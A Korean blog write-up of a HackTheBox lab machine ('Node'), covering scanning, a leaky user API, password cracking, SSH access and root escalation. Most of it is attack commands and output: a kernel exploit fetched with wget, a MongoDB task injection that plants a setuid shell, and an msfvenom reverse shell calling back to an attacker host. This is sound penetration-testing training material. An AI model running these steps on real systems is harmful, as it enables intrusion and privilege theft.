1. SCANNING

┌──(root💀takudaddy)-[/htb/n]
└─# nmap -A -p- 10.10.10.58
Starting Nmap 7.91 ( https://nmap.org ) at 2021-04-24 16:56 KST
Nmap scan report for 10.10.10.58
Host is up (0.21s latency).
Not shown: 65533 filtered ports
PORT     STATE SERVICE            VERSION
22/tcp   open  ssh                OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 dc:5e:34:a6:25:db:43:ec:eb:40:f4:96:7b:8e:d1:da (RSA)
|   256 6c:8e:5e:5f:4f:d5:41:7d:18:95:d1:dc:2e:3f:e5:9c (ECDSA)
|_  256 d8:78:b8:5d:85:ff:ad:7b:e6:e2:b5:da:1e:52:62:36 (ED25519)
3000/tcp open  hadoop-tasktracker Apache Hadoop
| hadoop-datanode-info: 
|_  Logs: /login
| hadoop-tasktracker-info: 
|_  Logs: /login
|_http-title: MyPlace
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port

 

 

 


 

 

 

2. WEB ENUMERATION

 

 

 

┌──(root💀takudaddy)-[/htb/n]
└─# gobuster dir -t 64 -u http://10.10.10.58:3000 -w /usr/share/wordlists/dirb/small.txt -s 200
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.10.10.58:3000
[+] Method:                  GET
[+] Threads:                 64
[+] Wordlist:                /usr/share/wordlists/dirb/small.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Timeout:                 10s
===============================================================
2021/04/24 19:52:59 Starting gobuster in directory enumeration mode
===============================================================
Error: the server returns a status code that matches the provided options for non existing 
urls. http://10.10.10.58:3000/f436f19b-c07a-4bd8-9a6d-64a2b270c2be => 200 (Length: 3861). 
To continue please exclude the status code, the length or use the --wildcard switch

 

 

안되는데 뭐가 있음

 

 

 

dirbuster로 돌려보니 뭐가 확실히 있음

 

 

 

소스코드 하단에 참조하는 js 구문을 살펴보면

 

 

 

Bootstrap v.3.3.7 사용

 

 

 

 

/api/session

 

 

 

/api/user

 

 

 

 

 

유저 정보가 나옴

 

 

myP14ceAdm1nAcc0uNT : manchester

tom : spongebob

mark : snowflake

rastating : cat'n find

 

 


 

 

 

3. EXPLOITATION

 

 

받아보면

 

 

나머지 유저는 별거 없음

 

 

다운 받은 파일 캐보기

┌──(root💀takudaddy)-[/htb/n]
└─# ls
myplace.backup  users.txt
                                                                        
┌──(root💀takudaddy)-[/htb/n]
└─# base64 -d myplace.backup > somefile                          
                                                                        
┌──(root💀takudaddy)-[/htb/n]
└─# file somefile                                                
somefile: Zip archive data, at least v1.0 to extract
                                                                        
┌──(root💀takudaddy)-[/htb/n]
└─# mv somefile somefile.zip
                                                                        
┌──(root💀takudaddy)-[/htb/n]
└─# file somefile.zip 
somefile.zip: Zip archive data, at least v1.0 to extract


┌──(root💀takudaddy)-[/htb/n]
└─# strings somefile.zip
r.woff2UT
var/www/myplace/static/vendor/bootstrap/js/UT
var/www/myplace/static/vendor/bootstrap/js/bootstrap.min.jsUT
var/www/myplace/static/vendor/bootstrap/js/bootstrap.jsUT
var/www/myplace/static/assets/UT
var/www/myplace/static/assets/css/UT
var/www/myplace/static/assets/css/freelancer.cssUT
var/www/myplace/static/assets/css/app.cssUT
var/www/myplace/static/assets/css/freelancer.min.cssUT
var/www/myplace/static/assets/js/UT
var/www/myplace/static/assets/js/misc/UT
var/www/myplace/static/assets/js/misc/freelancer.min.jsUT
var/www/myplace/static/assets/js/app/UT
..


┌──(root💀takudaddy)-[/htb/n]
└─# unzip somefile.zip  
Archive:  somefile.zip
   creating: var/www/myplace/
[somefile.zip] var/www/myplace/package-lock.json password:      


암호 크랙하기                                                                 
┌──(root💀takudaddy)-[/htb/n]
└─# fcrackzip -uD -p /usr/share/wordlists/rockyou.txt somefile.zip 
possible pw found: magicword ()
                                    

┌──(root💀takudaddy)-[/htb/n/var/www/myplace]
└─# unzip somefile.zip     
Archive:  somefile.zip
   creating: var/www/myplace/             
[somefile.zip] var/www/myplace/package-lock.json password: magicword
.....
flings-regular.woff  
  inflating: var/www/myplace/static/vendor/bootstrap/fonts/glyphicons-halflings-regular.woff2  
   creating: var/www/myplace/static/vendor/bootstrap/js/
  inflating: var/www/myplace/static/vendor/bootstrap/js/bootstrap.min.js  
  inflating: var/www/myplace/static/vendor/bootstrap/js/bootstrap.js  
   creating: var/www/myplace/static/assets/
   creating: var/www/myplace/static/assets/css/
  inflating: var/www/myplace/static/assets/css/freelancer.css  
  inflating: var/www/myplace/static/assets/css/app.css  
  inflating: var/www/myplace/st
..

┌──(root💀takudaddy)-[/htb/n]
└─# ls
myplace.backup  somefile.zip  users.txt  var
                                                                        
┌──(root💀takudaddy)-[/htb/n]
└─# cd var
                                                                        
┌──(root💀takudaddy)-[/htb/n/var]
└─# ls
www
                                                                        
┌──(root💀takudaddy)-[/htb/n/var]
└─# cd www      
                                                                        
┌──(root💀takudaddy)-[/htb/n/var/www]
└─# ls
myplace
                                                                        
┌──(root💀takudaddy)-[/htb/n/var/www]
└─# cd myplace   
                                                                        
┌──(root💀takudaddy)-[/htb/n/var/www/myplace]
└─# ls
app.html  app.js  node_modules  package.json  package-lock.json  static

┌──(root💀takudaddy)-[/htb/n/var/www/myplace]
└─# cat app.js                  

const express     = require('express');
const session     = require('express-session');
const bodyParser  = require('body-parser');
const crypto      = require('crypto');
const MongoClient = require('mongodb').MongoClient;
const ObjectID    = require('mongodb').ObjectID;
const path        = require("path");
const spawn        = require('child_process').spawn;
const app         = express();
const url         = 'mongodb://mark:5AYRft73VtFpc84k@localhost:27017/myplace?authMechanism=DEFAULT&authSource=myplace';
const backup_key  = '45fac180e9eee72f4fd2d9386ea7033e52b7c740afc3d98a8d0230167104d474';

....
                                                       

 

mark : 5AYRft73VtFpc84k

 

┌──(root💀takudaddy)-[/htb/n/var/www/myplace]
└─# ssh mark@10.10.10.58 
mark@10.10.10.58's password: 

The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc//copyright.

Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.


              .-. 
        .-'``(|||) 
     ,`\ \    `-`.                 88                         88 
    /   \ '``-.   `                88                         88 
  .-.  ,       `___:      88   88  88,888,  88   88  ,88888, 88888  88   88 
 (:::) :        ___       88   88  88   88  88   88  88   88  88    88   88 
  `-`  `       ,   :      88   88  88   88  88   88  88   88  88    88   88 
    \   / ,..-`   ,       88   88  88   88  88   88  88   88  88    88   88 
     `./ /    .-.`        '88888'  '88888'  '88888'  88   88  '8888 '88888' 
        `-..-(   ) 
              `-` 




The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/copyright.

Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.

Last login: Wed Sep 27 02:33:14 2017 from 10.10.14.3
mark@node:~$ 

 

침투 성공

 

 


 

 

4. POST EXPLOITATION & PRIVILEGE ESCALATION

 

 

 

간단한 방법

mark@node:~$ cd /tmp
mark@node:/tmp$ wget http://10.10.14.13/45010
--2021-04-24 14:10:43--  http://10.10.14.13/45010
Connecting to 10.10.14.13:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 22264 (22K)
Saving to: ‘45010’

45010                     100%[==================================>]  21.74K   105KB/s    in 0.2s    

2021-04-24 14:10:44 (105 KB/s) - ‘45010’ saved [22264/22264]

mark@node:/tmp$ chmod +x 45010
mark@node:/tmp$ ./45010
[.] 
[.] t(-_-t) exploit for counterfeit grsec kernels such as KSPP and linux-hardened t(-_-t)
[.] 
[.]   ** This vulnerability cannot be exploited at all on authentic grsecurity kernel **
[.] 
[*] creating bpf map
[*] sneaking evil bpf past the verifier
[*] creating socketpair()
[*] attaching bpf backdoor to socket
[*] skbuff => ffff880028853300
[*] Leaking sock struct from ffff88002569b000
[*] Sock->sk_rcvtimeo at offset 472
[*] Cred structure at ffff88002885e600
[*] UID from cred structure: 1001, matches the current: 1001
[*] hammering cred structure at ffff88002885e600
[*] credentials patched, launching shell...
# id   
uid=0(root) gid=0(root) groups=0(root),1001(mark)
# cat /root/root.txt
1722e99ca5f353b362556a62bd5e6be0

 

 

 

다른 방법

 

mark@node:~$ sudo -l
[sudo] password for mark: 

Sorry, user mark may not run sudo on node.


mark@node:/home$ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
tom:x:1000:1000:tom,,,:/home/tom:/bin/bash
mongodb:x:111:65534::/home/mongodb:/bin/false
mark:x:1001:1001:Mark,,,:/home/mark:/bin/bash

mark@node:/etc/init.d$ find / -perm -u=s -exec ls -li {} \; 2>/dev/null
259267 -rwsr-xr-x 1 root root 10232 Mar 27  2017 /usr/lib/eject/dmcrypt-get-device
297906 -rwsr-xr-x 1 root root 81672 Jul 17  2017 /usr/lib/snapd/snap-confine
278211 -rwsr-xr-- 1 root messagebus 42992 Jan 12  2017 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
278959 -rwsr-xr-x 1 root root 38984 Jun 14  2017 /usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic
17884 -rwsr-xr-x 1 root root 428240 Mar 16  2017 /usr/lib/openssh/ssh-keysign
282088 -rwsr-xr-x 1 root root 14864 Jan 17  2016 /usr/lib/policykit-1/polkit-agent-helper-1
303364 -rwsr-xr-- 1 root admin 16484 Sep  3  2017 /usr/local/bin/backup
258944 -rwsr-xr-x 1 root root 49584 May 17  2017 /usr/bin/chfn
281144 -rwsr-sr-x 1 daemon daemon 51464 Jan 14  2016 /usr/bin/at
259007 -rwsr-xr-x 1 root root 75304 May 17  2017 /usr/bin/gpasswd
279006 -rwsr-xr-x 1 root root 32944 May 17  2017 /usr/bin/newgidmap
258946 -rwsr-xr-x 1 root root 40432 May 17  2017 /usr/bin/chsh
259166 -rwsr-xr-x 1 root root 136808 Jul  4  2017 /usr/bin/sudo
282096 -rwsr-xr-x 1 root root 23376 Jan 17  2016 /usr/bin/pkexec
259071 -rwsr-xr-x 1 root root 39904 May 17  2017 /usr/bin/newgrp
259082 -rwsr-xr-x 1 root root 54256 May 17  2017 /usr/bin/passwd
279005 -rwsr-xr-x 1 root root 32944 May 17  2017 /usr/bin/newuidmap
258636 -rwsr-xr-x 1 root root 44168 May  7  2014 /bin/ping
258671 -rwsr-xr-x 1 root root 27608 Jun 14  2017 /bin/umount
278644 -rwsr-xr-x 1 root root 30800 Jul 12  2016 /bin/fusermount


mark@node:/home/tom$ ps -ef
root      1231     1  0 09:00 ?        00:00:02 /usr/sbin/sshd -D
tom       1232     1  6 09:00 ?        00:19:48 /usr/bin/node /var/www/myplace/app.js
tom       1234     1  0 09:00 ?        00:00:03 /usr/bin/node /var/scheduler/app.js
mongodb   1239     1  0 09:00 ?        00:01:17 /usr/bin/mongod --auth --quiet --config /etc/mongod.c
root      1256     1  0 09:00 ?        00:00:00 /sbin/iscsid
root      1257     1  0 09:00 ?        00:00:01 /sbin/iscsid
root      1331     1  0 09:00 tty1     00:00:00 /sbin/agetty --noclear tty1 linux
root      1509     2  0 09:15 ?        00:00:00 [kworker/0:0]
root     10411     2  0 11:05 ?        00:00:00 [kworker/u2:2]
root     10415     2  0 11:31 ?        00:00:00 [kworker/u2:1]
root     10540  1231  0 14:04 ?        00:00:00 sshd: mark [priv]
mark     10542     1  0 14:04 ?        00:00:00 /lib/systemd/systemd --user

mark@node:/tmp$ ls -l /usr/local/bin/backup
-rwsr-xr-- 1 root admin 16484 Sep  3  2017 /usr/local/bin/backup

mark@node:/tmp$ top -u tom
top - 14:24:18 up  5:24,  1 user,  load average: 0.00, 0.00, 0.00
Tasks: 159 total,   1 running, 158 sleeping,   0 stopped,   0 zombie
%Cpu(s):  0.0 us,  0.0 sy,  0.0 ni,100.0 id,  0.0 wa,  0.0 hi,  0.0 si,  0.0 st
KiB Mem :   758008 total,    52992 free,   192680 used,   512336 buff/cache
KiB Swap:   786428 total,   772024 free,    14404 used.   388616 avail Mem 

  PID USER      PR  NI    VIRT    RES    SHR S %CPU %MEM     TIME+ COMMAND                           
 1232 tom       20   0 1042596  56900  22708 S  0.0  7.5  19:48.70 node                              
 1234 tom       20   0 1008568  43660  22404 S  0.0  5.8   0:03.27 node                              
=> 
tom       1232     1  6 09:00 ?        00:19:48 /usr/bin/node /var/www/myplace/app.js
tom       1234     1  0 09:00 ?        00:00:03 /usr/bin/node /var/scheduler/app.js

mark@node:/tmp$ ls -l /usr/bin/node
lrwxrwxrwx 1 root root 22 Aug 30  2017 /usr/bin/node -> /etc/alternatives/node
mark@node:/tmp$ file /etc/alternatives/node 
/etc/alternatives/node: symbolic link to /usr/bin/nodejs


mark@node:/etc/init.d$ id tom
uid=1000(tom) gid=1000(tom) groups=1000(tom),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),
115(lpadmin),116(sambashare),1002(admin)


mark@node:/tmp$ netstat -ltnp
(Not all processes could be identified, non-owned process info
 will not be shown, you would have to be root to see it all.)
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name
tcp        0      0 127.0.0.1:27017         0.0.0.0:*               LISTEN      -               
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      -               
tcp6       0      0 :::3000                 :::*                    LISTEN      - 

 

/usr/local/bin/backup에 setuid 걸려있고 root:admin

그런데 tom이 admin 권한을 갖고 있음

 

 

 

mongodb 공격 구문

mark@node:/tmp$ mongo scheduler -u mark -p
MongoDB shell version: 3.2.16
Enter password: 
connecting to: scheduler
> db.tasks.insert({"cmd" : "cd /tmp ; cp /bin/bash . ; chown tom:admin -R ./* ; chmod 6755 ./*"})
WriteResult({ "nInserted" : 1 })
> ^C
bye


mark@node:/tmp$ ls -l
total 1052
-rwxrwxr-x 1 mark    mark      22264 Apr 19 07:59 45010
-rwsr-sr-x 1 tom     admin   1037528 Apr 24 14:57 bash
srwx------ 1 mongodb nogroup       0 Apr 24 09:00 mongodb-27017.sock
drwx------ 3 root    root       4096 Apr 24 09:00 systemd-private-44e7a7f0f66249d296999aeb0120ea36-systemd-timesyncd.service-zDjYFb
drwx------ 2 root    root       4096 Apr 24 09:00 vmware-root
mark@node:/tmp$ ./bash 
bash-4.3$ exit
exit
mark@node:/tmp$ ./bash -p
bash-4.3$ id
uid=1001(mark) gid=1001(mark) euid=1000(tom) egid=1002(admin) groups=1002(admin),1001(mark)
bash-4.3$ 



다른방법 (리버스 쉘 실행)



공격 서버에서 페이로드 생성 후 넘기고 리스너 기동
┌──(root💀takudaddy)-[/htb/n]
└─# msfvenom -p linux/x86/shell_reverse_tcp LHOST=10.10.14.13 LPORT=7979 -f elf > scpshell.elf
[-] No platform was selected, choosing Msf::Module::Platform::Linux from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder specified, outputting raw payload
Payload size: 68 bytes
Final size of elf file: 152 bytes
                                                                                     
┌──(root💀takudaddy)-[/htb/n]
└─# scp scpshell.elf mark@10.10.10.58:/tmp/attack.elf       
mark@10.10.10.58's password: 
scpshell.elf                                       100%  152     0.7KB/s   00:00    
                                                                                     
┌──(root💀takudaddy)-[/htb/n]
└─# nc -lvnp 7979                   
listening on [any] 7979 ...


침투서버에서 권한 주고 mongodb 접속해 파일 실행 
mark@node:/tmp$ chmod +x attack.elf 
mark@node:/tmp$ ls
45010
attack.elf
mongodb-27017.sock
systemd-private-44e7a7f0f66249d296999aeb0120ea36-systemd-timesyncd.service-zDjYFb
vmware-root

mark@node:/tmp$ mongo -u mark -p 5AYRft73VtFpc84k localhost:27017/scheduler
MongoDB shell version: 3.2.16
connecting to: localhost:27017/scheduler
> use scheduler
switched to db scheduler
> show collections
tasks
> db.tasks.insertOne({cmd:'/tmp/attack.elf'})
{
 "acknowledged" : true,
 "insertedId" : ObjectId("60842141833599628572cd95")
}


접속됨
┌──(root💀takudaddy)-[/htb/n]
└─# nc -lvnp 7979                                                                1 ⨯
listening on [any] 7979 ...
connect to [10.10.14.13] from (UNKNOWN) [10.10.10.58] 45390
id
uid=1000(tom) gid=1000(tom) groups=1000(tom),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),
115(lpadmin),116(sambashare),1002(admin)

 

 

id는 mark지만 admin 그룹 권한을 얻음.

 

bash-4.3$ ls -l /usr/local/bin/backup
-rwsr-xr-- 1 root admin 16484 Sep  3  2017 /usr/local/bin/backup
bash-4.3$ strings /usr/local/bin/backup
/lib/ld-linux.so.2
libc.so.6
_IO_stdin_used
setuid
strcpy
exit
sprintf
srand
fopen
strncpy
puts
time
clock
getpid
fgets
strstr
strcspn
fclose
strcat
remove
system
geteuid
strchr
access
strcmp
__libc_start_main
__gmon_start__
GLIBC_2.1
GLIBC_2.0
PTRh 
WVSQ
Y[^_]
UWVS
t$,U
[^_]
[37m
[33m
 %s[!]%s %s
[32m
 %s[+]%s %s
 %s[+]%s Starting archiving %s
             ____________________________________________________
            /                                                    \
           |    _____________________________________________     |
           |   |                                             |    |
           |   |             Secure Backup v1.0              |    |
           |   |_____________________________________________|    |
           |                                                      |
            \_____________________________________________________/
                   \_______________________________________/
                _______________________________________________
             _-'    .-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.  --- `-_
          _-'.-.-. .---.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.--.  .-.-.`-_
       _-'.-.-.-. .---.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-`__`. .-.-.-.`-_
    _-'.-.-.-.-. .-----.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-----. .-.-.-.-.`-_
 _-'.-.-.-.-.-. .---.-. .-----------------------------. .-.---. .---.-.-.-.`-_
:-----------------------------------------------------------------------------:
`---._.-----------------------------------------------------------------._.---'
Could not open file
Validated access token
Ah-ah-ah! You didn't say the magic word!
Finished! Encoded backup is below:
UEsDBDMDAQBjAG++IksAAAAA7QMAABgKAAAIAAsAcm9vdC50eHQBmQcAAgBBRQEIAEbBKBl0rFrayqfbwJ2YyHunnYq1Za6G7XLo8C3RH/hu0fArpSvYauq4AUycRmLuWvPyJk3sF+HmNMciNHfFNLD3LdkGmgwSW8j50xlO6SWiH5qU1Edz340bxpSlvaKvE4hnK/oan4wWPabhw/2rwaaJSXucU+pLgZorY67Q/Y6cfA2hLWJabgeobKjMy0njgC9c8cQDaVrfE/ZiS1S+rPgz/e2Pc3lgkQ+lAVBqjo4zmpQltgIXauCdhvlA1Pe/BXhPQBJab7NVF6Xm3207EfD3utbrcuUuQyF+rQhDCKsAEhqQ+Yyp1Tq2o6BvWJlhtWdts7rCubeoZPDBD6Mejp3XYkbSYYbzmgr1poNqnzT5XPiXnPwVqH1fG8OSO56xAvxx2mU2EP+Yhgo4OAghyW1sgV8FxenV8p5c+u9bTBTz/7WlQDI0HUsFAOHnWBTYR4HTvyi8OPZXKmwsPAG1hrlcrNDqPrpsmxxmVR8xSRbBDLSrH14pXYKPY/a4AZKO/GtVMULlrpbpIFqZ98zwmROFstmPl/cITNYWBlLtJ5AmsyCxBybfLxHdJKHMsK6Rp4MO+wXrd/EZNxM8lnW6XNOVgnFHMBsxJkqsYIWlO0MMyU9L1CL2RRwm2QvbdD8PLWA/jp1fuYUdWxvQWt7NjmXo7crC1dA0BDPg5pVNxTrOc6lADp7xvGK/kP4F0eR+53a4dSL0b6xFnbL7WwRpcF+Ate/Ut22WlFrg9A8gqBC8Ub1SnBU2b93ElbG9SFzno5TFmzXk3onbLaaEVZl9AKPA3sGEXZvVP+jueADQsokjJQwnzg1BRGFmqWbR6hxPagTVXBbQ+hytQdd26PCuhmRUyNjEIBFx/XqkSOfAhLI9+Oe4FH3hYqb1W6xfZcLhpBs4Vwh7t2WGrEnUm2/F+X/OD+s9xeYniyUrBTEaOWKEv2NOUZudU6X2VOTX6QbHJryLdSU9XLHB+nEGeq+sdtifdUGeFLct+Ee2pgR/AsSexKmzW09cx865KuxKnR3yoC6roUBb30Ijm5vQuzg/RM71P5ldpCK70RemYniiNeluBfHwQLOxkDn/8MN0CEBr1eFzkCNdblNBVA7b9m7GjoEhQXOpOpSGrXwbiHHm5C7Zn4kZtEy729ZOo71OVuT9i+4vCiWQLHrdxYkqiC7lmfCjMh9e05WEy1EBmPaFkYgxK2c6xWErsEv38++8xdqAcdEGXJBR2RT1TlxG/YlB4B7SwUem4xG6zJYi452F1klhkxloV6paNLWrcLwokdPJeCIrUbn+C9TesqoaaXASnictzNXUKzT905OFOcJwt7FbxyXk0z3FxD/tgtUHcFBLAQI/AzMDAQBjAG++IksAAAAA7QMAABgKAAAIAAsAAAAAAAAAIIC0gQAAAAByb290LnR4dAGZBwACAEFFAQgAUEsFBgAAAAABAAEAQQAAAB4EAAAAAA==
/root
/etc
/tmp/.backup_%i
/usr/bin/zip -r -P magicword %s %s > /dev/null
/usr/bin/base64 -w0 %s
The target path doesn't exist
;*2$"

 

 

 

 

728x90

'OSCP > HacktheBox' 카테고리의 다른 글

16. Love  (0) 2021.07.21
15. Armageddon  (0) 2021.07.20
13. Solid State  (0) 2021.04.24
12. Nineveh  (0) 2021.04.23
11. Brainfuck  (0) 2021.04.22

+ Recent posts